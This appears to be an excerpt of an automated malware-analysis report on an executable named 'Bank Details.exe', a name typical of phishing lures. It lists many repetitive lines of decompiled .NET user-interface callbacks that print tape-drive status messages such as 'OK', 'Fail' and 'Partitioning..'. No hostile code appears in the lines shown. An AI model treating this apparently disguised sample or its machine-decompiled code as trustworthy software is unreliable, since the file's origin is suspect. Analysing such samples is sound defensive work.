                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024NonLocal__0024VB_0024Closure_3._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { CS_0024_003C_003E8__locals1._0024VB_0024Local_ex.ToString() + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024NonLocal__0024VB_0024Closure_3._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Format failed." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { "Filemark written." }, (string[])null, (Type[])null);NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { $"Writing: {_0024VB_0024Local_fname}" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { $"Write finished: {_0024VB_0024Local_fname}" }, (string[])null, (Type[])null);NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "DataBuffer\r\n" }, (string[])null, (Type[])null);object textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)k2(array2, d0: true)) }, (string[])null, (Type[])null);textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\n\r\nSenseBuffer\r\n") }, (string[])null, (Type[])null);textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)(k2(array3) + "\r\n")) }, (string[])null, (Type[])null);textBox4 = TextBox8;object obj4 = textBox4;object[] array6 = new object[1];object obj5 = NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null);object obj6 = TapeUtils;object[] obj7 = new object[1] { array3 };object[] array7 = obj7;bool[] obj8 = new bool[1] { true };bool[] array8 = obj8;object obj9 = NewLateBinding.LateGet(obj6, (Type)null, "ParseSenseData", obj7, (string[])null, (Type[])null, obj8);if (array8[0]){array3 = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array7[0]), typeof(byte[]));}array6[0] = Operators.ConcatenateObject(obj5, Operators.ConcatenateObject(obj9, (object)"\r\n"));NewLateBinding.LateSet(obj4, (Type)null, "Text", array6, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{object textBox3 = TextBox8;NewLateBinding.LateSet(textBox3, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox3, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\nOK") }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{object textBox2 = TextBox8;NewLateBinding.LateSet(textBox2, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox2, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\nFAIL") }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(Panel2, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(text, "", false) == 0){text = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(objectValue, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" loaded (unthread)"));}text += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(TextBox2, (Type)null, "AppendText", array3 = new object[1] { text }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){text = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox3, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox1, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(text, "", false) == 0){text = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(objectValue, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" unthreaded"));}text += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(TextBox2, (Type)null, "AppendText", array3 = new object[1] { text }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){text = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "Start erase ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(CS_0024_003C_003E8__locals0._0024VB_0024Local_ModeData), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unthreading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Threading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Reinitializing.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unloading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unthreading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Threading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
